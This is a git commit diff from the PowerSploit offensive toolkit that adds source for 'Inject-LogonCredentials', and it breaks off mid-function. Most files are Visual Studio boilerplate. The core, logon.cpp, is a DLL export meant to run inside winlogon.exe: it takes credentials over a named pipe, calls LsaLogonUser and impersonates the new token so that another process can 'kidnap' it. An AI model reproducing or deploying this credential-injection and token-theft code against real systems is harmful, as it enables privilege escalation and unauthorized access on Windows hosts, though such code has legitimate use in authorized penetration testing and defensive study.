diff options
| author | clymb3r <bialek.joseph@gmail.com> | 2013-11-17 21:13:15 -0800 |
|---|---|---|
| committer | clymb3r <bialek.joseph@gmail.com> | 2013-11-17 21:13:15 -0800 |
| commit | 1503375bfbf0ee7ade498ea77444a4f1db4873e4 (patch) | |
| tree | 1aa744fc4d81ca649c4e6ee75bab1903446681f8 /Exfiltration/LogonUser | |
| parent | 5af0589e8f97aa49aef6bd083a00a4689c7553aa (diff) | |
| download | PowerSploit-1503375bfbf0ee7ade498ea77444a4f1db4873e4.tar.gz PowerSploit-1503375bfbf0ee7ade498ea77444a4f1db4873e4.zip | |
Adding Inject-LogonCredentials
Diffstat (limited to 'Exfiltration/LogonUser')
16 files changed, 1014 insertions, 0 deletions
diff --git a/Exfiltration/LogonUser/LogonUser/LogonUser.sln b/Exfiltration/LogonUser/LogonUser/LogonUser.sln new file mode 100644 index 0000000..890e833 --- /dev/null +++ b/Exfiltration/LogonUser/LogonUser/LogonUser.sln @@ -0,0 +1,26 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio 2012 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "logon", "logon\logon.vcxproj", "{D248AC1C-B831-42AE-835A-1B98B2BF9DF3}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|Win32 = Debug|Win32 + Debug|x64 = Debug|x64 + Release|Win32 = Release|Win32 + Release|x64 = Release|x64 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|Win32.ActiveCfg = Debug|Win32 + {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|Win32.Build.0 = Debug|Win32 + {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|x64.ActiveCfg = Debug|x64 + {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|x64.Build.0 = Debug|x64 + {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|Win32.ActiveCfg = Release|Win32 + {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|Win32.Build.0 = Release|Win32 + {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|x64.ActiveCfg = Release|x64 + {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|x64.Build.0 = Release|x64 + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection +EndGlobal diff --git a/Exfiltration/LogonUser/LogonUser/LogonUser/LogonUser.cpp b/Exfiltration/LogonUser/LogonUser/LogonUser/LogonUser.cpp new file mode 100644 index 0000000..f5b39fd --- /dev/null +++ b/Exfiltration/LogonUser/LogonUser/LogonUser/LogonUser.cpp @@ -0,0 +1,137 @@ +// LogonUser.cpp : Defines the entry point for the console application. +// + +#include "stdafx.h" + +using namespace std; + +size_t wcsByteLen( const wchar_t* str ); +void InitUnicodeString( UNICODE_STRING& str, const wchar_t* value, BYTE* buffer, size_t& offset ); +PVOID CreateNtlmLogonStructure(wstring domain, wstring username, wstring password, DWORD* size); +size_t WriteUnicodeString(wstring str, UNICODE_STRING* uniStr, PVOID baseAddress, size_t offset); + +int _tmain(int argc, _TCHAR* argv[]) +{ + //Get a handle to LSA + HANDLE hLSA = NULL; + NTSTATUS status = LsaConnectUntrusted(&hLSA); + if (status != 0) + { + cout << "Error calling LsaConnectUntrusted. Error code: " << status << endl; + return -1; + } + if (hLSA == NULL) + { + cout << "hLSA is NULL, this shouldn't ever happen" << endl; + return -1; + } + + //Build LsaLogonUser parameters + LSA_STRING originName = {}; + char originNameStr[] = "qpqp"; + originName.Buffer = originNameStr; + originName.Length = (USHORT)strlen(originNameStr); + originName.MaximumLength = originName.Length; + + ULONG authPackage = 0; + PLSA_STRING authPackageName = new LSA_STRING(); + char authPackageBuf[] = MSV1_0_PACKAGE_NAME; + authPackageName->Buffer = authPackageBuf; + authPackageName->Length = (USHORT)strlen(authPackageBuf); + authPackageName->MaximumLength = (USHORT)strlen(authPackageBuf); + status = LsaLookupAuthenticationPackage(hLSA, authPackageName, &authPackage); + if (status != 0) + { + int winError = LsaNtStatusToWinError(status); + cout << "Call to LsaLookupAuthenticationPackage failed. Error code: " << winError; + return -1; + } + + DWORD authBufferSize = 0; + PVOID authBuffer = CreateNtlmLogonStructure(L"VMWORKSTATION", L"testuser", L"Password1", &authBufferSize); + cout << "authBufferSize: " << authBufferSize << endl; + + //Get TokenSource + HANDLE hProcess = GetCurrentProcess();//todo + HANDLE procToken = NULL; + BOOL success = OpenProcessToken(hProcess, TOKEN_ALL_ACCESS, &procToken); + if (!success) + { + DWORD errorCode = GetLastError(); + cout << "Call to OpenProcessToken failed. Errorcode: " << errorCode << endl; + return -1; + } + + TOKEN_SOURCE tokenSource = {}; + DWORD realSize = 0; + success = GetTokenInformation(procToken, TokenSource, &tokenSource, sizeof(tokenSource), &realSize); + if (!success) + { + cout << "Call to GetTokenInformation failed." << endl; + return -1; + } + + + //Misc + PVOID profileBuffer = NULL; + ULONG profileBufferSize = 0; + LUID loginId; + HANDLE token = NULL; + QUOTA_LIMITS quotaLimits; + NTSTATUS subStatus = 0; + + status = LsaLogonUser(hLSA, + &originName, + RemoteInteractive, + authPackage, + authBuffer, + authBufferSize, + 0, + &tokenSource, + &profileBuffer, + &profileBufferSize, + &loginId, + &token, + "aLimits, + &subStatus); + + if (status != 0) + { + NTSTATUS winError = LsaNtStatusToWinError(status); + cout << "Error calling LsaLogonUser. Error code: " << winError << endl; + return -1; + } + + cout << "Success!" << endl; + + return 1; +} + +//size will be set to the size of the structure created +PVOID CreateNtlmLogonStructure(wstring domain, wstring username, wstring password, DWORD* size) +{ + size_t wcharSize = sizeof(wchar_t); + + size_t totalSize = sizeof(MSV1_0_INTERACTIVE_LOGON) + ((domain.length() + username.length() + password.length()) * wcharSize); + MSV1_0_INTERACTIVE_LOGON* ntlmLogon = (PMSV1_0_INTERACTIVE_LOGON)(new BYTE[totalSize]); + size_t offset = sizeof(MSV1_0_INTERACTIVE_LOGON); + + ntlmLogon->MessageType = MsV1_0InteractiveLogon; + offset += WriteUnicodeString(domain, &(ntlmLogon->LogonDomainName), ntlmLogon, offset); + offset += WriteUnicodeString(username, &(ntlmLogon->UserName), ntlmLogon, offset); + offset += WriteUnicodeString(password, &(ntlmLogon->Password), ntlmLogon, offset); + + *size = (DWORD)totalSize; //If the size is bigger than a DWORD, there is a gigantic bug somewhere. + return ntlmLogon; +} + +size_t WriteUnicodeString(wstring str, UNICODE_STRING* uniStr, PVOID baseAddress, size_t offset) +{ + const wchar_t* buffer = str.c_str(); + size_t size = str.length() * sizeof(wchar_t); + uniStr->Length = (USHORT)size; + uniStr->MaximumLength = (USHORT)size; + uniStr->Buffer = (PWSTR)((UINT_PTR)baseAddress + offset); + memcpy((PVOID)((UINT_PTR)baseAddress + offset), str.c_str(), size); + return size; +}
\ No newline at end of file diff --git a/Exfiltration/LogonUser/LogonUser/LogonUser/LogonUser.vcxproj b/Exfiltration/LogonUser/LogonUser/LogonUser/LogonUser.vcxproj new file mode 100644 index 0000000..7fd8de2 --- /dev/null +++ b/Exfiltration/LogonUser/LogonUser/LogonUser/LogonUser.vcxproj @@ -0,0 +1,158 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{F9DC2AAF-2213-4D87-9F52-283DA1CC6E18}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>LogonUser</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>v110</PlatformToolset> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>v110</PlatformToolset> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>v110</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>v110</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <LinkIncremental>true</LinkIncremental> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <LinkIncremental>true</LinkIncremental> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <LinkIncremental>false</LinkIncremental> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <LinkIncremental>false</LinkIncremental> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader>Use</PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalDependencies>secur32.lib;%(AdditionalDependencies)</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader>Use</PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalDependencies>secur32.lib;%(AdditionalDependencies)</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader>Use</PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader>Use</PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + </ItemDefinitionGroup> + <ItemGroup> + <Text Include="ReadMe.txt" /> + </ItemGroup> + <ItemGroup> + <ClInclude Include="stdafx.h" /> + <ClInclude Include="targetver.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="LogonUser.cpp" /> + <ClCompile Include="stdafx.cpp"> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader> + </ClCompile> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project>
\ No newline at end of file diff --git a/Exfiltration/LogonUser/LogonUser/LogonUser/LogonUser.vcxproj.filters b/Exfiltration/LogonUser/LogonUser/LogonUser/LogonUser.vcxproj.filters new file mode 100644 index 0000000..f92726f --- /dev/null +++ b/Exfiltration/LogonUser/LogonUser/LogonUser/LogonUser.vcxproj.filters @@ -0,0 +1,36 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <Filter Include="Source Files"> + <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier> + <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions> + </Filter> + <Filter Include="Header Files"> + <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier> + <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions> + </Filter> + <Filter Include="Resource Files"> + <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier> + <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions> + </Filter> + </ItemGroup> + <ItemGroup> + <Text Include="ReadMe.txt" /> + </ItemGroup> + <ItemGroup> + <ClInclude Include="stdafx.h"> + <Filter>Header Files</Filter> + </ClInclude> + <ClInclude Include="targetver.h"> + <Filter>Header Files</Filter> + </ClInclude> + </ItemGroup> + <ItemGroup> + <ClCompile Include="stdafx.cpp"> + <Filter>Source Files</Filter> + </ClCompile> + <ClCompile Include="LogonUser.cpp"> + <Filter>Source Files</Filter> + </ClCompile> + </ItemGroup> +</Project>
\ No newline at end of file diff --git a/Exfiltration/LogonUser/LogonUser/LogonUser/ReadMe.txt b/Exfiltration/LogonUser/LogonUser/LogonUser/ReadMe.txt new file mode 100644 index 0000000..8275e56 --- /dev/null +++ b/Exfiltration/LogonUser/LogonUser/LogonUser/ReadMe.txt @@ -0,0 +1,40 @@ +======================================================================== + CONSOLE APPLICATION : LogonUser Project Overview +======================================================================== + +AppWizard has created this LogonUser application for you. + +This file contains a summary of what you will find in each of the files that +make up your LogonUser application. + + +LogonUser.vcxproj + This is the main project file for VC++ projects generated using an Application Wizard. + It contains information about the version of Visual C++ that generated the file, and + information about the platforms, configurations, and project features selected with the + Application Wizard. + +LogonUser.vcxproj.filters + This is the filters file for VC++ projects generated using an Application Wizard. + It contains information about the association between the files in your project + and the filters. This association is used in the IDE to show grouping of files with + similar extensions under a specific node (for e.g. ".cpp" files are associated with the + "Source Files" filter). + +LogonUser.cpp + This is the main application source file. + +///////////////////////////////////////////////////////////////////////////// +Other standard files: + +StdAfx.h, StdAfx.cpp + These files are used to build a precompiled header (PCH) file + named LogonUser.pch and a precompiled types file named StdAfx.obj. + +///////////////////////////////////////////////////////////////////////////// +Other notes: + +AppWizard uses "TODO:" comments to indicate parts of the source code you +should add to or customize. + +///////////////////////////////////////////////////////////////////////////// diff --git a/Exfiltration/LogonUser/LogonUser/LogonUser/stdafx.cpp b/Exfiltration/LogonUser/LogonUser/LogonUser/stdafx.cpp new file mode 100644 index 0000000..d213d3a --- /dev/null +++ b/Exfiltration/LogonUser/LogonUser/LogonUser/stdafx.cpp @@ -0,0 +1,8 @@ +// stdafx.cpp : source file that includes just the standard includes +// LogonUser.pch will be the pre-compiled header +// stdafx.obj will contain the pre-compiled type information + +#include "stdafx.h" + +// TODO: reference any additional headers you need in STDAFX.H +// and not in this file diff --git a/Exfiltration/LogonUser/LogonUser/LogonUser/stdafx.h b/Exfiltration/LogonUser/LogonUser/LogonUser/stdafx.h new file mode 100644 index 0000000..cb2a53f --- /dev/null +++ b/Exfiltration/LogonUser/LogonUser/LogonUser/stdafx.h @@ -0,0 +1,20 @@ +// stdafx.h : include file for standard system include files, +// or project specific include files that are used frequently, but +// are changed infrequently +// + +#pragma once + +#include "targetver.h" +#include <stdio.h> +#include <tchar.h> +#include <iostream> +#include <string> +#include <Windows.h> +#include <NTSecAPI.h> + + + + + +// TODO: reference additional headers your program requires here diff --git a/Exfiltration/LogonUser/LogonUser/LogonUser/targetver.h b/Exfiltration/LogonUser/LogonUser/LogonUser/targetver.h new file mode 100644 index 0000000..87c0086 --- /dev/null +++ b/Exfiltration/LogonUser/LogonUser/LogonUser/targetver.h @@ -0,0 +1,8 @@ +#pragma once + +// Including SDKDDKVer.h defines the highest available Windows platform. + +// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and +// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. + +#include <SDKDDKVer.h> diff --git a/Exfiltration/LogonUser/LogonUser/logon/ReadMe.txt b/Exfiltration/LogonUser/LogonUser/logon/ReadMe.txt new file mode 100644 index 0000000..605d341 --- /dev/null +++ b/Exfiltration/LogonUser/LogonUser/logon/ReadMe.txt @@ -0,0 +1,48 @@ +======================================================================== + DYNAMIC LINK LIBRARY : logon Project Overview +======================================================================== + +AppWizard has created this logon DLL for you. + +This file contains a summary of what you will find in each of the files that +make up your logon application. + + +logon.vcxproj + This is the main project file for VC++ projects generated using an Application Wizard. + It contains information about the version of Visual C++ that generated the file, and + information about the platforms, configurations, and project features selected with the + Application Wizard. + +logon.vcxproj.filters + This is the filters file for VC++ projects generated using an Application Wizard. + It contains information about the association between the files in your project + and the filters. This association is used in the IDE to show grouping of files with + similar extensions under a specific node (for e.g. ".cpp" files are associated with the + "Source Files" filter). + +logon.cpp + This is the main DLL source file. + + When created, this DLL does not export any symbols. As a result, it + will not produce a .lib file when it is built. If you wish this project + to be a project dependency of some other project, you will either need to + add code to export some symbols from the DLL so that an export library + will be produced, or you can set the Ignore Input Library property to Yes + on the General propert page of the Linker folder in the project's Property + Pages dialog box. + +///////////////////////////////////////////////////////////////////////////// +Other standard files: + +StdAfx.h, StdAfx.cpp + These files are used to build a precompiled header (PCH) file + named logon.pch and a precompiled types file named StdAfx.obj. + +///////////////////////////////////////////////////////////////////////////// +Other notes: + +AppWizard uses "TODO:" comments to indicate parts of the source code you +should add to or customize. + +///////////////////////////////////////////////////////////////////////////// diff --git a/Exfiltration/LogonUser/LogonUser/logon/dllmain.cpp b/Exfiltration/LogonUser/LogonUser/logon/dllmain.cpp new file mode 100644 index 0000000..69b5891 --- /dev/null +++ b/Exfiltration/LogonUser/LogonUser/logon/dllmain.cpp @@ -0,0 +1,19 @@ +// dllmain.cpp : Defines the entry point for the DLL application. +#include "stdafx.h" + +BOOL APIENTRY DllMain( HMODULE hModule, + DWORD ul_reason_for_call, + LPVOID lpReserved + ) +{ + switch (ul_reason_for_call) + { + case DLL_PROCESS_ATTACH: + case DLL_THREAD_ATTACH: + case DLL_THREAD_DETACH: + case DLL_PROCESS_DETACH: + break; + } + return TRUE; +} + diff --git a/Exfiltration/LogonUser/LogonUser/logon/logon.cpp b/Exfiltration/LogonUser/LogonUser/logon/logon.cpp new file mode 100644 index 0000000..8011ed8 --- /dev/null +++ b/Exfiltration/LogonUser/LogonUser/logon/logon.cpp @@ -0,0 +1,258 @@ +// logon.cpp : Defines the exported functions for the DLL application. +// + +#include "stdafx.h" + +using namespace std; + +size_t wcsByteLen( const wchar_t* str ); +void InitUnicodeString( UNICODE_STRING& str, const wchar_t* value, BYTE* buffer, size_t& offset ); +PVOID CreateKerbLogonStructure(const wchar_t* domain, const wchar_t* username, const wchar_t* password, DWORD* size); +PVOID CreateNtlmLogonStructure(const wchar_t* domain, const wchar_t* username, const wchar_t* password, DWORD* size); +size_t WriteUnicodeString(const wchar_t* str, UNICODE_STRING* uniStr, PVOID address); +void WriteErrorToPipe(string errorMsg, HANDLE pipe); + +extern "C" __declspec( dllexport ) void VoidFunc(); + + +//The entire point of this code is to call LsaLogonUser from within winlogon.exe +extern "C" __declspec( dllexport ) void VoidFunc() +{ + //Open a pipe which will receive data from the PowerShell script. + HANDLE pipe = CreateFile(L"\\\\.\\pipe\\sqsvc", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); + if (pipe == INVALID_HANDLE_VALUE) + { + return; + } + + const size_t strSize = 257; + size_t bytesToRead = strSize * sizeof(wchar_t) - sizeof(wchar_t); + wchar_t* domain = new wchar_t[strSize]; + wchar_t* username = new wchar_t[strSize]; + wchar_t* password = new wchar_t[strSize]; + DWORD bytesRead = 0; + + BOOL success = ReadFile(pipe, domain, strSize, &bytesRead, NULL); + if (!success) + { + return; + } + domain[bytesRead/2] = '\0'; + + success = ReadFile(pipe, username, strSize-2, &bytesRead, NULL); + if (!success) + { + return; + } + username[bytesRead/2] = '\0'; + + success = ReadFile(pipe, password, strSize-2, &bytesRead, NULL); + if (!success) + { + return; + } + password[bytesRead/2] = '\0'; + + //Get the logon type from the pipe + USHORT logonType = 10; + success = ReadFile(pipe, &logonType, 1, &bytesRead, NULL); + if (!success) + { + return; + } + + //Get the authentication package to use. 1 = Msv1_0, 2 = Kerberos + USHORT authPackageToUse = 0; + success = ReadFile(pipe, &authPackageToUse, 1, &bytesRead, NULL); + if (!success) + { + return; + } + + + ///////////// + //Build the parameters to call LsaLogonUser with + ///////////// + + //Get a handle to LSA + HANDLE hLSA = NULL; + NTSTATUS status = LsaConnectUntrusted(&hLSA); + if (status != 0) + { + string errorMsg = "Error calling LsaConnectUntrusted. Error code: " + to_string(status); + WriteErrorToPipe(errorMsg, pipe); + return; + } + if (hLSA == NULL) + { + string errorMsg = "hLSA (LSA handle) is NULL, this shouldn't ever happen."; + WriteErrorToPipe(errorMsg, pipe); + return; + } + + //Build LsaLogonUser parameters + LSA_STRING originName = {}; + char originNameStr[] = ""; + originName.Buffer = originNameStr; + originName.Length = (USHORT)0; + originName.MaximumLength = 0; + + //Build the authentication package parameter based on the auth package the powershell script specified to use + //Also get the AuthenticationInformation + char* authPackageBuf = NULL; + DWORD authBufferSize = 0; + PVOID authBuffer = NULL; + if (authPackageToUse == 1) + { + authPackageBuf = MSV1_0_PACKAGE_NAME; + authBuffer = CreateNtlmLogonStructure(domain, username, password, &authBufferSize); + } + else if (authPackageToUse == 2) + { + authPackageBuf = MICROSOFT_KERBEROS_NAME_A; + authBuffer = CreateKerbLogonStructure(domain, username, password, &authBufferSize); + } + else + { + string errorMsg = "Received an invalid auth package from the named pipe"; + WriteErrorToPipe(errorMsg, pipe); + return; + } + + ULONG authPackage = 0; + PLSA_STRING authPackageName = new LSA_STRING(); + authPackageName->Buffer = authPackageBuf; + authPackageName->Length = (USHORT)strlen(authPackageBuf); + authPackageName->MaximumLength = (USHORT)strlen(authPackageBuf); + status = LsaLookupAuthenticationPackage(hLSA, authPackageName, &authPackage); + if (status != 0) + { + int winError = LsaNtStatusToWinError(status); + string errorMsg = "Call to LsaLookupAuthenticationPackage failed. Error code: " + to_string(winError); + WriteErrorToPipe(errorMsg, pipe); + return; + } + + //Get TokenSource + HANDLE hProcess = GetCurrentProcess();//todo + HANDLE procToken = NULL; + success = OpenProcessToken(hProcess, TOKEN_ALL_ACCESS, &procToken); + if (!success) + { + DWORD errorCode = GetLastError(); + string errorMsg = "Call to OpenProcessToken failed. Errorcode: " + to_string(errorCode); + WriteErrorToPipe(errorMsg, pipe); + return; + } + + TOKEN_SOURCE tokenSource = {}; + DWORD realSize = 0; + success = GetTokenInformation(procToken, TokenSource, &tokenSource, sizeof(tokenSource), &realSize); + if (!success) + { + string errorMsg = "Call to GetTokenInformation failed."; + WriteErrorToPipe(errorMsg, pipe); + return; + } + + //Misc out parameters + PVOID profileBuffer = NULL; + ULONG profileBufferSize = 0; + LUID loginId; + HANDLE token = NULL; + QUOTA_LIMITS quotaLimits; + NTSTATUS subStatus = 0; + + //Log on the user + status = LsaLogonUser(hLSA, + &originName, + static_cast<SECURITY_LOGON_TYPE>(logonType), + authPackage, + authBuffer, + authBufferSize, + 0, + &tokenSource, + &profileBuffer, + &profileBufferSize, + &loginId, + &token, + "aLimits, + &subStatus); + + if (status != 0) + { + NTSTATUS winError = LsaNtStatusToWinError(status); + string errorMsg = "Error calling LsaLogonUser. Error code: " + to_string(winError); + WriteErrorToPipe(errorMsg, pipe); + return; + } + + + //Impersonate the token with the current thread so it can be kidnapped + ImpersonateLoggedOnUser(token); + + //Put the thread to sleep so it can be impersonated + string successMsg = "Logon succeeded, impersonating the token so it can be kidnapped and starting an infinite loop with the thread."; + WriteErrorToPipe(successMsg, pipe); + HANDLE permenantSleep = CreateMutex(NULL, false, NULL); + while(1) + { + Sleep(MAXDWORD); + } + + return; +} + + +PVOID CreateKerbLogonStructure(const wchar_t* domain, const wchar_t* username, const wchar_t* password, DWORD* size) +{ + size_t wcharSize = sizeof(wchar_t); + + size_t totalSize = sizeof(KERB_INTERACTIVE_LOGON) + ((lstrlenW(domain) + lstrlenW(username) + lstrlenW(password)) * wcharSize); + KERB_INTERACTIVE_LOGON* ntlmLogon = (PKERB_INTERACTIVE_LOGON)(new BYTE[totalSize]); + size_t writeAddress = (UINT_PTR)ntlmLogon + sizeof(KERB_INTERACTIVE_LOGON); + + ntlmLogon->MessageType = KerbInteractiveLogon; + writeAddress += WriteUnicodeString(domain, &(ntlmLogon->LogonDomainName), (PVOID)writeAddress); + writeAddress += WriteUnicodeString(username, &(ntlmLogon->UserName), (PVOID)writeAddress); + writeAddress += WriteUnicodeString(password, &(ntlmLogon->Password), (PVOID)writeAddress); + + *size = (DWORD)totalSize; //If the size is bigger than a DWORD, there is a gigantic bug somewhere. + return ntlmLogon; +} + + +PVOID CreateNtlmLogonStructure(const wchar_t* domain, const wchar_t* username, const wchar_t* password, DWORD* size) +{ + size_t wcharSize = sizeof(wchar_t); + + size_t totalSize = sizeof(MSV1_0_INTERACTIVE_LOGON) + ((lstrlenW(domain) + lstrlenW(username) + lstrlenW(password)) * wcharSize); + MSV1_0_INTERACTIVE_LOGON* ntlmLogon = (PMSV1_0_INTERACTIVE_LOGON)(new BYTE[totalSize]); + size_t writeAddress = (UINT_PTR)ntlmLogon + sizeof(MSV1_0_INTERACTIVE_LOGON); + + ntlmLogon->MessageType = MsV1_0InteractiveLogon; + writeAddress += WriteUnicodeString(domain, &(ntlmLogon->LogonDomainName), (PVOID)writeAddress); + writeAddress += WriteUnicodeString(username, &(ntlmLogon->UserName), (PVOID)writeAddress); + writeAddress += WriteUnicodeString(password, &(ntlmLogon->Password), (PVOID)writeAddress); + + *size = (DWORD)totalSize; //If the size is bigger than a DWORD, there is a gigantic bug somewhere. + return ntlmLogon; +} + +//Returns the amount of bytes written. +size_t WriteUnicodeString(const wchar_t* str, UNICODE_STRING* uniStr, PVOID address) +{ + size_t size = lstrlenW(str) * sizeof(wchar_t); + 